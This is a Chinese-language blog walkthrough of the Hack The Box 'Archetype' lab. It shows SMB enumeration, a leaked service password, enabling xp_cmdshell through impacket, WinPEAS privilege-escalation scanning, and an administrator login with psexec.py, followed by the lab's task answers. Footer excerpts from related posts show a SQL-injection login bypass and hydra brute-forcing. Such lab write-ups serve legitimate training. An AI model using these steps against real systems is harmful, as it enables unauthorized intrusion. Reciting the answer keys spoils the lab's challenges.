Hack The Box :: Starting Point - Archetype
扫描
nmap 10.129.95.187 -sV |
查看smb共享目录
smbclient -L 10.129.95.187 |
获取共享文件,看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123
smbclient \\\\10.129.95.187\\backups |
使用smbclient.py进行数据库连接,也可以用sqlmap,sqlmap更方便一些
https://github.com/fortra/impacket
#msclient |
使用sql命令开启xp_cmdshell执行系统命令效果和sqlmap的一样,二选一即可
enable_xp_cmdshell |
获取信息,一般查看桌面和历史命令user.txt
dir c:\users\sql_svc\desktop\ |
Winpeas,下载后执行, 会进行扫描然后给出提示
https://github.com/carlospolop/PEASS-ng
./winPEASx64.exe |
历史命令 ,通过Winpeas查看到,路径 C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ |
上面获取到了administrato的密码,可以使用msf通过smb获取flag,或者用 impacket 里面的psexec.py有可以
msfconsle
msfconsole |
方法2 psexec.py
python psexec.py administrator@10.129.95.187 |
Task 1 Which TCP port is hosting a database server?
1433
Task 2 What is the name of the non-Administrative share available over SMB?
backups
Task 3 What is the password identified in the file on the SMB share?
M3g4c0rp123
Task 4 What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
mssqlclient.py
mssqlclient.py https://github.com/SecureAuthCorp/impacket.git
Task 5 What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
xp_cmdshell
Task 6 What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Winpeas
Task 7 What file contains the administrator’s password?
ConsoleHost_history.txt
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps!
微信
相关推荐
2023-02-28
Hack The Box :: Starting Point - Appointment
端口扫描nmap -sV 10.129.24.207 页面为登录页面,根据提示为SQL注入,尝试用 ‘ or 1=1;# 测试admin1' or 1=1;# Task 1 What does the acronym SQL stand for? Structured Query Language Task 2 What is one of the most common type of SQL vulnerabilities? sql injection Task 3 What does PII stand for? personally identifiable information Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection Task 5 What does Nmap report as the service and version that are running on...
2023-02-28
Hack The Box :: Starting Point - Crocodile
端口扫描nmap 10.129.171.69nmap 10.129.171.69 -A -p 21,80 允许匿名用户登录, 并且存在两个文件ftp 10.129.171.69 Anonymous #登录 ls #列出目录 get allowed.userlist get allowed.userlist.passwd exitcat allowed.userlistcat allowed.userlist.passwd 浏览80端口 爆破路径gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php 用上面文件的信息登录下,获得flag Task 1 What Nmap scanning switch employs the use of default scripts during a scan? -sC Task 2 What service version...
2023-02-28
Hack The Box :: Starting Point - Dancing
扫描nmap --open 10.129.1.125 查看smb服务smbclient -L 10.129.1.125#smbclient \\\\IP\\共享目录smbclient \\\\10.129.1.125\\WorkShares ls #dir也是可以的 TASK 1 What does the 3-letter acronym SMB stand for? server message block TASK 2 What port does SMB use to operate at? 445 TASK 3 What is the service name for port 445 that came up in our Nmap scan? microsoft-ds TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share? -L TASK 5 How many shares...
2023-02-28
Hack The Box :: Starting Point - Meow
一些名词,比较简单 TASK 1 What does the acronym VM stand for? Virtual Machine TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell. terminal TASK 3 What service do we use to form our VPN connection into HTB labs? openvpn Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output? tun Task 5 What tool do...
2023-02-28
Hack The Box :: Starting Point - Fawn
扫描nmap --open 10.129.26.35nmap -A -p 21 10.129.26.35 获取flagftp 10.129.26.35 anonymous ls get flag.txt cat flag.txt TASK 1 What does the 3-letter acronym FTP stand for? File Transfer Protocol TASK 2 Which port does the FTP service listen on usually? 21 TASK 3 What acronym is used for the secure version of FTP? SFTP TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target? ping TASK 5 From your scans, what version is FTP...
2023-03-01
Hack The Box :: Starting Point - Oopsie
扫描发现22,80开放nmap -sV 10.129.114.125 访问web,发现/cdn-cgi/login/路径 另外爆破路径可以用gobuster,成功率取决与字典gobuster dir -u http://10.129.114.125 -w 字典路径 访问http://10.129.114.125/cdn-cgi/login/ , 有个login as guest 页面Account url id=2,替换为1会是什么样呢 cookies 修改cookie值,role为admin, user为34322刷新 ,可以发现upload可以上传东西 也可以对登陆页面可以暴力破解,但是通过上面的绕过更方便可以用burpsuite也可以用hydra 登录并查看请求信息 请求地址 http://10.129.114.125/cdn-cgi/login/index.php post的数据username=admin&password=1 hydra -l admin -P pass.txt -f 10.129.41.170...
评论
